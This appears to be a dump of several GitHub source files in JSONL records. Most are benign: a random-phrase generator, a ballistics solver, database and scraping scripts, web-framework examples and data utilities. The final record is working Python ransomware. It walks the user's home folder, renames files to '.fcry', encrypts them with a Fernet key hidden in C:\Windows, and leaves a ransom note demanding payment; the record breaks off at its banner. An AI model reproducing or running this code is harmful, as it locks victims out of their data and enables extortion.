\",\"molhou \",\"enxaguou \",\"espirrou n\",\"acenou para \",\n \"pissoteou \",\"escravizou \",\"clonou \",\"pirateou \",\"chifrou \",\n \"desembrulhou \",\"refletiu sobre \",\"converteu \",\"plantou \", \"envenenou \",\n \"cabeceou \",\"chutou \",\"sentiu \",\"acorrentou \",\"amarrou \",\n \"enfeitissou \",\"entristeceu \",\"colocou fralda n\",\"urinou n\",\n \"queimou \",\"resgatou \",\"deitou n\",\"deu um tapa n\"]\n \n substantivos = [\"a pedra\",\"o pepino\",\"a goiaba\",\"o chinelo\",\"a banana\",\n \"a bola\",\"a arvore\",\"o vizinho\",\"o menino\",\"o mendigo\",\n \"o rei leao\",\"o professor\",\"o pirata\",\"o sniper\",\n \"o bob esponja\",\"o patrick\",\"o pikachu\",\"o naruto\",\n \"o barney\",\"o hulk\",\"o goku\",\"o cebolinha\",\n \"a caixa\",\"o piano\",\"a lanterna\",\"a privada\",\"a garrafa\",\n \"o pernilongo\",\"o biscoito\",\"o pastel\",\"a raquete\",\n \"a cadeira\",\"o Harry Potter\",\"o neymar\",\"o scooby-doo\",\n \"o ninja\",\"o cachorro\",\"a galinha\",\"a batata\",\"a espada\",\n \"o cafe da manha\",\"o avatar aang\",\"o Ash Ketchun da cidade de Pallet\",\n \"o para-quedas\",\"o batman\",\"o homem aranha\",\"a flor\",\n \"o abajour\",\"o desodorante\",\"a lampada\",\"o pato Donald\",\n \"o coco\",\"o celular\",\"o pasteleiro\",\"o vampiro\",\n \"a maionese\",\"o lapis\",\"o cabelereiro\",\"a lata de lixo\",\n \"o pescador\",\"o jardineiro\",\"a peruca\",\"o careca\",\n \"o peixinho dourado\",\"o avestruz\",\"o ornitorrinco\",\n \"o padre\",\"o palhasso\",\"a lingua\",\"o sapato\",\"a massaneta\",\n \"o caderno\",\"o surfador\",\"a tarantula\",\"o espelho\",\n \"a tartaruga\",\"o golfinho\",\"o papelão\",\"a canetinha\",\n \"o bife\",\"o copo\",\"o mergulhador\",\"o foguete\",\n \"o beija-flor\",\"o paralelepipedo\",\"o cubão\",\"o cachimbo\",\n \"o papel higienico\",\"o queijo\",\"o presunto\",\"a salsicha\",\n \"a girafa\",\"o ralador de queijo\", \"o Michael Jackson\", \"o fautao\",\n \"a beterraba\", \"a melancia\", \"o ben 10\", \"a turma da monica\", \"o pica-pau\",\n \"a dora aventureira\", \"a galinha pintadinha\", \"a branca de neve\",\n \"a bruxa do 71\", \"o gato de botas\",\"o dinossauro\", \"o camelo\",\n \"a bisnaguinha\",\"o berimbau\",\"a azeitona verde\", \"o porco espinho\",\n \"a almondega\"]\n \n complemento = [\" de pijama\", \" sem calça\",\" na floresta\",\" no banheiro\", \" na fazenda\", \" na igreja\", \" no quintal\",\n \" em cima do telhado\", \" na batcaverna\", \" no milharal\", \" na caverna do dragao\", \" na disney\",\n \" no parquinho\", \" em cima da goiabeira\", \" no busao\", \" na estaçao de trem\", \" num pais da europa\",\n \" na lua\", \" no hospital\", \" no bueiro\", \" na cozinha\", \" no sofa\", \" na montanha russa\",\n \" em cima da montanha\", \" na academia\", \" no mercado\", \" na fabrica de chocolate\",\n \" no quarto de hospedes\", \" na geladeira\", \" na feira\", \" na biblioteca\",\n \" no quarto dos fundos\", \" no castelo\", \" em hogwarts\", \" no bandeco\",\" no hospicio\",\n \" na reunião geral\", \" no aquario\", \" na sala da EESC jr\",\" debaixo da mesa\",\n \" dentro do armario\",\" debaixo da pia\",\" no palquinho\", \" no zoologico\",\n \" debaixo da cama\", \" no pais das maravilhas\",\" no digimundo\",\n \" no navio\",\" no carro\",\" no trem\",\" na casa\",\" no predio\"]\n \n print(random.choice(verbos)+random.choice(substantivos)+random.choice(complemento))\n para = input(\"\")\n if para != \"\":\n break","repo_name":"AllanKamimura/Pai_ta_ON_python","sub_path":"random coisas/sorteador.py","file_name":"sorteador.py","file_ext":"py","file_size_in_byte":6037,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"14804233130","text":"import time\nimport numpy as np\n\nfrom Calculations.OneVelocity.OvInit import ov_create_layer\nfrom Calculations.Invariants.Plot import plot_one\n\n\ndef solver(q, p_f, x_bord, geom, powder, omega, n_cells, Ku, sigma_v, R, r):\n \"\"\"\n Формирование словаря входных данных для расчета внутренней баллистики (порох)\n :param q: масса снаряда\n :param p_f: давление форсирования\n :param x_bord: координата x правой границы камеры сгорания\n :param geom: список кортежей из координаты узла и диаметра\n :param powder: словарь с характеристиками пороха\n :param omega: масса навески пороха\n :param n_cells: кол-во узлов рассчетной сетки\n :param Ku: число Куранта\n :param sigma_v: предел упругости материала\n :param R: внешний радиус трубы (ствола)\n :param r: внутренний радиус трубы (ствола)\n :return: словарь входных данных\n \"\"\"\n return {'borders': [{'m': 1000, 'p_f': 1e8, 'x': 0, 'V': 0},\n {'m': q, 'p_f': p_f, 'x': x_bord, 'V': 0}],\n 'geom': geom,\n 'grids': [{'consts': powder,\n 'init_const': {'omega': omega,\n 't_init': 0},\n 'n_cells': n_cells,\n 'name': 'powder',\n 'type': 'powder'}],\n 'q': q,\n 'sigma_v': sigma_v,\n 'R': R,\n 'r': r,\n 'courant_number': Ku}\n\n\ndef calc_run(solver):\n \"\"\"\n Функция для рассчета внутренней баллистики (порох)\n :param solver: словарь входных данных\n :return: массив распределения температуры после вылета снаряда из ствола\n \"\"\"\n start_time = time.time()\n layer = ov_create_layer(solver)\n\n time_arr = [0] # Список времени для графика\n V_arr = [0] # Список скорости для графика\n x_arr = [layer.x[-1]] # Список координаты для графика\n p_arr_sn = [layer.p[-1]]\n p_arr_dn = [layer.p[0]]\n Vmax = 0\n\n flag = True\n\n results = [solver]\n\n while True:\n if (solver['geom'][-1][0] - layer.x[-1]) <= 0.001:\n results.append({'time_arr': time_arr,\n 'V_arr': V_arr,\n 'x_arr': x_arr,\n 'p_arr_sn': p_arr_sn,\n 'p_arr_dn': p_arr_dn})\n\n break\n\n if (Vmax - layer.V[-1]) > 1:\n flag = False\n break\n\n sigma = 2 / 3 * layer.p * (2 * layer.R_out ** 2 + layer.r_in ** 2) / (layer.R_out ** 2 - layer.r_in ** 2)\n\n if sum(layer.sigma_v >= sigma) != layer.n:\n flag = False\n print('Не соблюдается условие прочности! Превышен предел упругости материала!')\n break\n\n tau = solver['courant_number'] * layer.time_step() # Вычисление шага по времени\n layer1 = layer.euler_step(layer, tau)\n layer = layer1\n\n time_arr.append(layer.time) # Добавление текущего шага по времени в список для графика\n V_arr.append(layer.V[-1]) # Добавление текущей скорости поршня в список для графика\n x_arr.append(layer.x[-1]) # Добавление текущей координаты поршня в список для графика\n p_arr_sn.append(layer.p[-1])\n p_arr_dn.append(layer.p[0])\n\n if layer.V[-1] > Vmax:\n Vmax = layer.V[-1]\n\n if flag:\n T = layer.powd.etta * (layer.q[2] / layer.q[0] - 0.5 * np.square(layer.q[1] / layer.q[0])) \\\n / (layer.powd.f / layer.powd.T_1)\n\n # print(\"--- %s seconds ---\" % (time.time() - start_time))\n #\n # print('Условие прочности соблюдается!')\n # print('Время вылета:', time_arr[-1], 'с')\n # print('Скорость вылета:', V_arr[-1], 'м/с')\n # print('Максимальное давление на дно снаряда:', max(p_arr_sn) / 1_000_000, 'МПа')\n # print('Максимальное давление на дно канала ствола:', max(p_arr_dn) / 1_000_000, 'МПа')\n # # print(T)\n #\n # plot_one(time_arr, V_arr, 'График скорости снаряда от времени', 't, c', 'Vд, м/с')\n # plot_one(x_arr, V_arr, 'График скорости снаряда от координаты ствола', 'x, м', 'Vд, м/с')\n # plot_one(time_arr, np.array(p_arr_sn) / 1_000_000, 'График давления на дно снаряда от времени', 't, c', 'p_sn, МПа')\n # plot_one(time_arr, np.array(p_arr_dn) /1_000_000, 'График давления на дно канала ствола от времени', 't, c', 'p_ch, МПа')\n #\n # print(results)\n return results, T, True\n else:\n return None, None, False\n","repo_name":"MakarVS/Bang","sub_path":"Calculations/calculations_one_velocity.py","file_name":"calculations_one_velocity.py","file_ext":"py","file_size_in_byte":5498,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"42"} +{"seq_id":"26803645250","text":"import cx_Oracle\nimport csv\n\n# Load data from a csv file into Oracle table using executemany\ntry:\n con = cx_Oracle.connect('sangram/sangram@localhost:1521/xe')\n\nexcept cx_Oracle.DatabaseError as er:\n print('There is an error in Oracle database:' + str(er))\n\nelse:\n try:\n cur = con.cursor()\n with open('employee.csv', 'r') as read_csv:\n csv_reader = csv.reader(read_csv)\n # Remove the header\n # Creating a list of records to be inserted into Oracle table\n csv_reader = list(csv_reader)[1:]\n # Data transformation within each record\n csv_reader = [[int(csv_reader[i][0]), csv_reader[i][1], float(csv_reader[i][2])] for i in\n range(len(csv_reader))]\n\n cur = con.cursor()\n # Inserting multiple records into employee table\n cur.executemany('insert into employee values(:1,:2,:3)', csv_reader)\n\n except cx_Oracle.DatabaseError as er:\n print('There is an error in Oracle database:' + str(er))\n\n except Exception as er:\n print(er)\n\n else:\n # To commit the transaction manually\n con.commit()\n print('Multiple records are inserted successfully')\n\nfinally:\n if cur:\n cur.close()\n if con:\n con.close()","repo_name":"sandeep63314/PYTHON","sub_path":"69_working_with_ORACLE_database/4_insert_into_table_executemany.py","file_name":"4_insert_into_table_executemany.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"12235804990","text":"from Deck import Deck\nimport unittest\n\n\nclass DeckTest(unittest.TestCase):\n\n def setUp(self):\n self.deck = Deck()\n\n def test_createDeck(self):\n self.assertEqual(52, self.deck.getNumOfCards())\n\n def test_shuffle(self):\n testDeck = self.deck.getAllCards()\n compareDeck = []\n for card in testDeck:\n compareDeck.append(card)\n numOfSameCards = 0\n for x in range(0, 52):\n if compareDeck[x] == testDeck[x]:\n numOfSameCards += 1\n self.assertEqual(52, numOfSameCards)\n self.deck.shuffle()\n numOfSameCards = 0\n for x in range(0, 52):\n if compareDeck[x] == testDeck[x]:\n numOfSameCards += 1\n self.assertNotEqual(52, numOfSameCards)\n\n def test_getNextCard(self):\n newDeck = Deck()\n for x in range(0, 52):\n newDeck.getNextCard()\n with self.assertRaises((NameError)):\n newDeck.getNextCard()\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"charleshan/Blackjack","sub_path":"DeckTest.py","file_name":"DeckTest.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"28466102789","text":"\"\"\"Récupérer les DECP sur le site marches-securises\"\"\"\n\nimport argparse\nimport json\nfrom pathlib import Path\nfrom typing import Dict, Optional\nfrom urllib.parse import urljoin\n\nfrom bs4 import BeautifulSoup\nimport requests\n\n\nURL = \"https://www.marches-securises.fr/entreprise/\"\n\nPARAMS = {\n \"module\": \"liste_donnees_essentielles\",\n \"presta\": \";services;travaux;fournitures;autres\",\n \"date_cloture_type\": \"0\",\n \"donnees_essentielles\": \"1\",\n}\n\nFORM_DATA = {\n \"module\": \"liste_consultations\",\n \"submit.x\": \"76\",\n \"submit.y\": \"13\",\n \"search\": \"table_ms\",\n \"presta_au\": \"1\",\n # \"siret_pa1\"\n \"objet\": \"\",\n # \"date_deb_ms\"\n # \"date_fin_ms\"\n \"dep_liste\": \"\",\n \"siret_pa\": \"\",\n \"type_marche\": \"MARCHE\",\n \"type_procedure\": \"\",\n \"date_deb\": \"\",\n \"date_fin\": \"\",\n \"ref_ume\": \"\",\n \"cpv_et\": \"\",\n \"rs_oe\": \"\",\n \"texte_libre\": \"\",\n}\n\n\ndef download_json_from_results_page(html_page: str):\n \"\"\"Télécharge les DECP au format JSON dans une page de résultats.\n\n Renvoie une liste de DECP au format JSON.\n\n Parameters\n ----------\n html_page: str\n Page HTML de résultats du site\n\n Returns\n -------\n json_entries: List[JSON_DECP]\n Liste d'entrées DECP en JSON\n \"\"\"\n # analyser la page de 10 résultats pour extraire les liens vers les\n # fichiers JSON\n r_soup = BeautifulSoup(html_page, \"html.parser\")\n links_json = r_soup.find_all(title=\"Télécharger au format Json\")\n # print(links_json)\n # print(len(links_json))\n\n # récupérer chaque fichier JSON et l'analyser\n json_entries = []\n for link in links_json:\n url_json = urljoin(\"https://www.marches-securises.fr\", link[\"href\"])\n r_json = requests.get(url_json)\n # print(r_json.text)\n # la cible n'est pas un fichier JSON, mais une page HTML dont le body\n # contient l'entrée au format JSON...\n # 1. le HTML renvoyé est incorrect: il n'y a de et la\n # balise n'est pas fermée... le plus simple est de jeter\n # tout ce qui a été ajouté avant l'entrée JSON, donc jusqu'au\n # inclus\n # 2. le HTML est en UTF-8 mais le JSON est codé en ASCII, avec des\n # backslashes supplémentaires pour les caractères non-ASCII, on prend\n # donc le \".content\" brut pour le décoder avec\n # \"raw_unicode_escape\"\n # (réf: )\n entry = r_json.content.decode(\"raw_unicode_escape\").split(\"\")[1].strip()\n json_entry = json.loads(entry)\n json_entries.append(json_entry)\n return json_entries\n\n\ndef get_next_page(html_page: str) -> Optional[str]:\n \"\"\"Extrait l'URL de la page de résultats suivante.\n\n Renvoie None s'il n'y a pas de page suivante.\n\n Parameters\n ----------\n html_page: str\n Page de résultats (HTML) actuelle.\n\n Returns\n -------\n next_page: str or None\n URL de la page de résultats (HTML) suivante.\n \"\"\"\n r_soup = BeautifulSoup(html_page, \"html.parser\")\n pagination_data = r_soup.find(\"div\", class_=\"pagination_data\")\n # le lien vers la prochaine page est un dont le texte est \">>\"\n # donc on cherche le texte \">>\", on remonte au , on remonte au et on récupère\n # l'adresse href\n try:\n next_page = pagination_data.find(text=\">>\").parent.parent[\"href\"]\n except KeyError:\n return None\n else:\n return next_page\n\n\ndef scrape_decp(args_data: Dict[str, str]):\n \"\"\"Récupère les DECP depuis marches-securises.\n\n Une requête est définie par un SIRET acheteur et des dates de début et fin.\n Les résultats sont une liste d'entrées DECP au format JSON.\n\n Parameters\n ----------\n args_data: Dict[str, str]\n Paramètres de la requête: SIRET et dates de début et fin.\n\n Returns\n -------\n json_entries: List[JSON_DECP]\n Liste d'entrées DECP au format JSON.\n \"\"\"\n # liste de stockage des résultats\n json_entries = []\n # envoyer la requête par le formulaire\n # avec les paramètres: SIRET et dates de début et fin\n FORM_DATA.update(args_data)\n r = requests.post(URL, data=FORM_DATA, params=PARAMS)\n # on reçoit la 1re page de résultats\n result_page = r.text\n print(f\"Page initiale: {r.url}\")\n while True:\n # récupérer les JSON de la page de résultats courante (10 max)\n new_entries = download_json_from_results_page(result_page)\n json_entries.extend(new_entries)\n # extraire l'adresse de la prochaine page\n next_page = get_next_page(result_page)\n if next_page is None:\n break\n print(f\"Page suivante: {next_page}\")\n result_page = requests.get(next_page).text\n return json_entries\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(\n description=\"Récupère les DECP d'un acheteur sur marches-securises.fr\"\n )\n # ex: Croix: \"21590163800019\", \"2019-01-01\", \"2021-12-31\"\n parser.add_argument(\"siret\", help=\"SIRET de l'acheteur\")\n parser.add_argument(\"datedeb\", help=\"Date de début\")\n parser.add_argument(\"datefin\", help=\"Date de fin\")\n args = parser.parse_args()\n # fichier de résultats\n fp_out = Path(\n \"data\", \"processed\", f\"decp_{args.siret}_{args.datedeb}_{args.datefin}.json\"\n )\n # paramètres spécifiques à cette exécution\n args_data = {\n \"siret_pa1\": args.siret,\n \"date_deb_ms\": args.datedeb,\n \"date_fin_ms\": args.datefin,\n }\n # extraction des résultats\n json_entries = scrape_decp(args_data)\n # export dans un fichier JSON\n with open(fp_out, mode=\"w\") as f_out:\n json.dump({\"marches\": json_entries}, f_out, ensure_ascii=False, indent=2)\n","repo_name":"moreymat/decp-marches-securises","sub_path":"get_decp_siret.py","file_name":"get_decp_siret.py","file_ext":"py","file_size_in_byte":5793,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"73832104446","text":"import numpy as np\nimport random\nnp.random.seed(7)\n\n\ndef randomly(percent):\n \"\"\"\n :param percent: list of percentage to draw for each class\n :return: new list of percentage to draw for each class\n \"\"\"\n new_percent = []\n for i in range(len(percent)):\n value = random.uniform(percent[i]-0.05, percent[i]+0.05)\n new_percent.append(value)\n return new_percent\n\n\ndef generate_data(x, y, methode, threshold):\n \"\"\"\n\n :param x: The input samples, array-like of shape (n_samples, max_len)\n :param y: The target values, ndarray of shape (n_samples)\n :param methode: methode of balanced methode, str or list\n :param threshold: percent of desired observations in the under-represented class\n :return: x_new ndarray array of shape (new_samples_size, max_len), y_new ndarray array of shape (new_samples_size)\n \"\"\"\n\n if methode == \"classical\":\n return x, y\n label, indexes, counts_elements = np.unique(y, return_counts=True, return_index=True)\n\n if type(methode) is list:\n percent = methode\n else:\n min_p = np.min(counts_elements)\n percent = [threshold * min_p / x for x in counts_elements]\n if methode == \"randomly\":\n percent = randomly(percent)\n\n sample_size = [a * b for a, b in zip(percent, counts_elements)]\n res = {label[i]: round(sample_size[i]) for i in range(len(label))}\n\n x_train = np.empty((0, x.shape[1]))\n y_train = np.empty((0,))\n for key, value in res.items():\n msk = y == key\n idx = np.random.choice(sum(msk), int(value), replace=False)\n x_train = np.concatenate([x_train, x[msk, :][idx, :]])\n y_train = np.hstack((y_train, np.repeat(key, len(idx))))\n\n indexes = None\n counts_elements = None\n percent = None\n sample_size = None\n label = None\n res = None\n\n return x_train, y_train\n","repo_name":"isaaccs/Insurance-reports-through-deep-neural-networks","sub_path":"utils/bagging.py","file_name":"bagging.py","file_ext":"py","file_size_in_byte":1860,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"42"} +{"seq_id":"41482762707","text":"import asyncio\nimport json\nfrom contextlib import suppress\nfrom typing import Tuple, OrderedDict\n\nimport aioredis\nfrom aioredis import Redis\nfrom aioredis.errors import BusyGroupError\nfrom loguru import logger\n\nfrom redis_test.defect import PredictionMessage\n\n\nasync def db_worker_loop(redis: Redis) -> None:\n while True:\n items = await redis.xread_group(\n 'db-worker',\n 'db-worker-1',\n ['predictions'],\n count=100,\n latest_ids=['>']\n )\n logger.info('db-worker-1: Read {} messages from \"predictions\"', len(items))\n\n for item in items:\n prediction = _parse_payload(item)\n logger.info('db-worker: {}', prediction)\n\n\nasync def fe_worker_loop(redis: Redis) -> None:\n while True:\n item = await redis.xread_group(\n 'fe-worker',\n 'fe-worker-1',\n ['predictions'],\n count=1,\n latest_ids=['>']\n )\n item = item[0]\n\n prediction = _parse_payload(item)\n logger.info('fe-worker: {}', prediction)\n\n\ndef _parse_payload(item: Tuple[str, str, OrderedDict]) -> PredictionMessage:\n _, message_id, message = item\n payload = message['payload']\n prediction = PredictionMessage(**json.loads(payload))\n return prediction\n\n\nasync def main():\n redis = await aioredis.create_redis_pool('redis://localhost', encoding='utf-8')\n\n with suppress(BusyGroupError):\n await redis.xgroup_create('predictions', 'db-worker', latest_id='0')\n\n with suppress(BusyGroupError):\n await redis.xgroup_create('predictions', 'fe-worker', latest_id='$')\n\n db_task = asyncio.create_task(db_worker_loop(redis))\n fe_task = asyncio.create_task(fe_worker_loop(redis))\n await asyncio.gather(db_task, fe_task)\n\n\nasyncio.run(main())\n","repo_name":"Dozer74/redis-test","sub_path":"redis_test/consumer.py","file_name":"consumer.py","file_ext":"py","file_size_in_byte":1818,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"24864203634","text":"from sanic import Sanic\nfrom sanic import response\nfrom signal import signal, SIGINT\nimport asyncio\nimport uvloop\n\napp = Sanic(__name__)\n\n\n@app.route(\"/\")\nasync def test(request):\n return response.json({\"answer\": \"42\"})\n\nasyncio.set_event_loop(uvloop.new_event_loop())\nserver = app.create_server(host=\"0.0.0.0\", port=8000, return_asyncio_server=True)\nloop = asyncio.get_event_loop()\ntask = asyncio.ensure_future(server)\nsignal(SIGINT, lambda s, f: loop.stop())\ntry:\n loop.run_forever()\nexcept:\n loop.stop()\n","repo_name":"cider-security-research/cicd-goat","sub_path":"gitea/repositories/cheshire-cat/examples/run_async.py","file_name":"run_async.py","file_ext":"py","file_size_in_byte":516,"program_lang":"python","lang":"en","doc_type":"code","stars":1684,"dataset":"github-code","pt":"42"} +{"seq_id":"17378033200","text":"from django.shortcuts import render, redirect, reverse\n\n# Create your views here.\ndef view_cart(request):\n \"\"\"A View that renders the cart contents page\"\"\"\n return render(request, \"cart.html\")\n\n\ndef add_to_cart(request, id):\n \"\"\"Add a quantity of the specified product to the cart\"\"\"\n quantity = int(request.POST.get('quantity'))\n\n cart = request.session.get('cart', {})\n \n if id in cart:\n #If the item is already in the cart, you want to add the new quantity to the existing quantity. \n cart[id] = int(cart[id]) + quantity \n else:\n #However, if the item is not in the cart, then the current add_to_cart view works.\n cart[id] = cart.get(id, quantity) \n\n\n request.session['cart'] = cart\n return redirect(reverse('index'))# the products.hml is called index\n\n\ndef adjust_cart(request, id):\n \"\"\"\n Adjust the quantity of the specified product to the specified\n amount\n \"\"\"\n quantity = int(request.POST.get('quantity'))\n cart = request.session.get('cart', {})\n\n #we can only adjust if a quantity is greater than 0. If there's nothing in the cart, you cannot adjust it.\n if quantity > 0:\n cart[id] = quantity\n else:\n cart.pop(id)\n \n request.session['cart'] = cart\n return redirect(reverse('view_cart'))","repo_name":"Rasquin/ecommerce","sub_path":"cart/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"73593552127","text":"from typing import List, Dict, Type\nfrom datetime import datetime as dt\nimport click\nimport pandas as pd\n\nfrom .tech_processors import ALL_TECHS\nfrom .base_processor import TechProcessor\nfrom .config import FINANCIAL_CASES, CRP_CHOICES\n\nclass ProcessAll:\n \"\"\"\n Extract data from ATB workbook and calculate LCOE for techs, CRPs, and financial\n scenarios.\n \"\"\"\n def __init__(self, data_workbook_fname: str,\n techs: List[Type[TechProcessor]]|Type[TechProcessor]):\n \"\"\"\n @param data_workbook_fname - name of workbook\n @param techs - one or more techs to run\n \"\"\"\n if not isinstance(techs, list):\n techs = [techs]\n\n self.data = pd.DataFrame() # Flat data\n self.meta = pd.DataFrame() # Meta data\n\n self._techs = techs\n self._fname = data_workbook_fname\n\n def process(self, test_capex: bool = True, test_lcoe: bool = True):\n \"\"\" Process all techs \"\"\"\n self.data = pd.DataFrame()\n self.meta = pd.DataFrame()\n\n for i, Tech in enumerate(self._techs):\n print(f'##### Processing {Tech.tech_name} ({i+1}/{len(self._techs)}) #####')\n\n for crp in CRP_CHOICES:\n # skip TechLife if 20 or 30 so we don't duplicate effort\n if crp == 'TechLife' and Tech.tech_life in CRP_CHOICES:\n continue\n\n for case in FINANCIAL_CASES:\n proc = Tech(self._fname, crp=crp, case=case)\n proc.run()\n\n if test_capex:\n proc.test_capex()\n if test_lcoe:\n proc.test_lcoe()\n\n flat = proc.flat\n self.data = pd.concat([self.data, flat])\n\n meta = proc.get_meta_data()\n meta['Tech Name'] = Tech.tech_name\n self.meta = pd.concat([self.meta, meta])\n\n self.data = self.data.reset_index(drop=True)\n self.meta = self.meta.reset_index(drop=True)\n\n @property\n def data_flattened(self):\n \"\"\" Get flat data pivoted with each year as a row \"\"\"\n if self.data is None:\n raise ValueError('Please run process() first')\n\n melted = pd.melt(self.data, id_vars=['Parameter', 'Case', 'CRPYears',\n 'Technology', 'DisplayName', 'Scenario'])\n return melted\n\n def to_csv(self, fname: str):\n \"\"\" Write data to CSV \"\"\"\n if self.data is None:\n raise ValueError('Please run process() first')\n\n self.data.to_csv(fname)\n\n def flat_to_csv(self, fname: str):\n \"\"\" Write pivoted data to CSV \"\"\"\n if self.data is None:\n raise ValueError('Please run process() first')\n self.data_flattened.to_csv(fname)\n\n def meta_data_to_csv(self, fname: str):\n \"\"\" Write meta data to CSV \"\"\"\n if self.data is None:\n raise ValueError('Please run process() first')\n\n self.meta.to_csv(fname)\n\n\ntech_names = [Tech.__name__ for Tech in ALL_TECHS]\n\n@click.command\n@click.argument('data_workbook_filename', type=click.Path(exists=True))\n@click.option('-t', '--tech', type=click.Choice(tech_names),\n help=\"Name of tech to process. Process all techs if none are specified.\")\n@click.option('-m', '--save-meta', 'meta_file', type=click.Path(),\n help=\"Save meta data to CSV.\")\n@click.option('-f', '--save-flat', 'flat_file', type=click.Path(),\n help=\"Save data in flat format to CSV.\")\n@click.option('-p', '--save-pivoted', 'pivoted_file', type=click.Path(),\n help=\"Save data in pivoted format to CSV.\")\n@click.option('-c', '--clipboard', is_flag=True, default=False,\n help=\"Copy data to system clipboard.\")\ndef process(data_workbook_filename: str, tech: str|None, meta_file: str|None, flat_file: str|None,\n pivoted_file: str|None, clipboard: bool):\n \"\"\"\n CLI to process ATB data workbook and calculate metrics.\n \"\"\"\n tech_map: Dict[str, Type[TechProcessor]] = {tech.__name__: tech for tech in ALL_TECHS}\n\n techs = ALL_TECHS if tech is None else [tech_map[tech]]\n\n start_dt = dt.now()\n processor = ProcessAll(data_workbook_filename, techs)\n processor.process()\n click.echo(f'Processing completed in {dt.now()-start_dt}.')\n\n if meta_file:\n click.echo(f'Writing meta data to {meta_file}.')\n processor.meta_data_to_csv(meta_file)\n\n if flat_file:\n click.echo(f'Writing flat data to {flat_file}.')\n processor.flat_to_csv(flat_file)\n\n if pivoted_file:\n click.echo(f'Writing pivoted data to {pivoted_file}.')\n processor.to_csv(pivoted_file)\n\n if clipboard:\n click.echo('Data was copied to clipboard.')\n processor.data.to_clipboard()\n\n\nif __name__ == '__main__':\n process() # pylint: disable=no-value-for-parameter\n","repo_name":"NREL/ATB-calc","sub_path":"lcoe_calculator/process_all.py","file_name":"process_all.py","file_ext":"py","file_size_in_byte":4899,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"42"} +{"seq_id":"9027597894","text":"from sys import exit\nfrom time import sleep\nfrom sys import platform\nfrom getpass import getuser\nfrom signal import signal, SIGINT\nfrom cryptography.fernet import Fernet\nfrom os import walk, rename, system, path\nfrom colorama import Fore, Back, Cursor, init\n\ninit()\n\n# Array en donde se guardan los directorios\ndirectorio_raiz = []\ncam_s = []\ncam_fc = []\n\n# Dirección raíz\npath_win = \"\"\n\n# Ruta para guardar clave de encryptación\nroute_crypt = ''\n\n# Ruta para guardar las capturas de pantalla\nruta_capturas = \"\"\n\nusuario = \"\"\n\ndef handler(signal_received, frame):\n\tprint( Back.RED + Fore.BLACK + \"\\n Saliendo de la aplicaicón \" + Fore.RESET + Back.RESET)\n\texit(0)\n\ndef generarClave():\n\tglobal route_crypt\n\tkey = Fernet.generate_key()\n\tif platform.startswith('win32'):\n\t\troute_crypt = 'C:\\\\Windows\\\\'\n\telif platform.startswith('linux'):\n\t\troute_crypt = '/home' + usuario + ' Escritorio/'\n\troute_crypt = route_crypt + 'fcry.key'\n\twith open(route_crypt, 'wb') as key_file:\n\t\tkey_file.write(key)\n\ndef cargarClave():\n\treturn open(route_crypt, 'rb').read()\n\ndef encryptarDatosUsuario(items, key):\n\tf = Fernet(key)\n\tfor item in items:\n\t\tif path.isfile(item):\n\t\t\twith open(item, 'rb') as file:\n\t\t\t\tfile_data = file.read()\n\t\t\t\tencrypted_data = f.encrypt(file_data)\n\t\t\t\twith open(item, 'wb') as file:\n\t\t\t\t\tprint(\"Encriptando\")\n\t\t\t\t\tfile.write(encrypted_data)\n\ndef messageFinal():\n\troute = \"\"\n\tif platform.startswith('win32'):\n\t\troute = \"C:\\\\Users\\\\\" + usuario + \"\\\\Desktop\\\\TWH-README.txt\"\n\telif platform.startswith('linux'):\n\t\troute = \"/home\" + usuario + \"/Escritorio/TWH-README.txt\"\n\tfile = open(route, 'w')\n\tfile.write(\"--------------README.txt----------------\\n\")\n\tfile.write(\" AL PARECER TIENEN UN PROBLEMA DE\\n\")\n\tfile.write(\" SEGURIDAD EN SU RED\\n\")\n\tfile.write(\" SUS ARCHIVOS HAN SIDO ENCRYPTADOS\\n\")\n\tfile.write(\"NECESITA UNA CLAVE PARA DESENCRYPTARLOS\\n\")\n\tfile.write(\" Y TIENE QUE PAGAR POR ELLA\")\n\tfile.write(\"--------------README.txt----------------\\n\")\n\tfile.close()\n\ndef getListArch():\n\tkey = cargarClave()\n\tif platform.startswith(\"linux\"):\n\t\tdirectorio_raiz = \"/home\" + usuario\n\telif platform.startswith(\"win32\"):\n\t\tdirectorio_raiz = \"C:\\\\Users\\\\\" + usuario + \"\\\\\"\n\tfor nombre_directorio, dirs, ficheros in walk(directorio_raiz):\n\t\tprint(Fore.GREEN + \"|-[D]\" + nombre_directorio + Fore.RESET)\n\t\tfor nombre_fichero in ficheros:\n\t\t\tprint(Fore.YELLOW + \"|\" + Fore.RESET)\n\t\t\tprint(Fore.YELLOW + \"|--[F]\" + nombre_fichero + Fore.RESET)\n\t\t\tif path.isfile(nombre_directorio + \"/\" + nombre_fichero):\n\t\t\t\tcam_s.append(nombre_directorio + \"/\" + nombre_fichero)\n\tfor i in range(0, len(cam_s)):\n\t\tcam_fc.append(cam_s[i] + \".fcry\")\n\t\trename(cam_s[i], cam_fc[i])\n\tencryptarDatosUsuario(cam_fc, key)\n\tmessageFinal()\n\ndef banner():\n\tprint(Fore.GREEN + \"+--------------------------------------------+\" + Fore.RESET)\n\tprint(Fore.GREEN + \"| |\" + Fore.RESET)\n\tprint(Fore.GREEN + \"| ███████╗ ██████╗██████╗ ██╗ ██╗ |\" + Fore.RESET)\n\tprint(Fore.GREEN + \"| ██╔════╝██╔════╝██╔══██╗╚██╗ ██╔╝ |\" + Fore.RESET)\n\tprint(Fore.GREEN + \"| █████╗ ██║ ██████╔╝ ╚████╔╝ |\" + 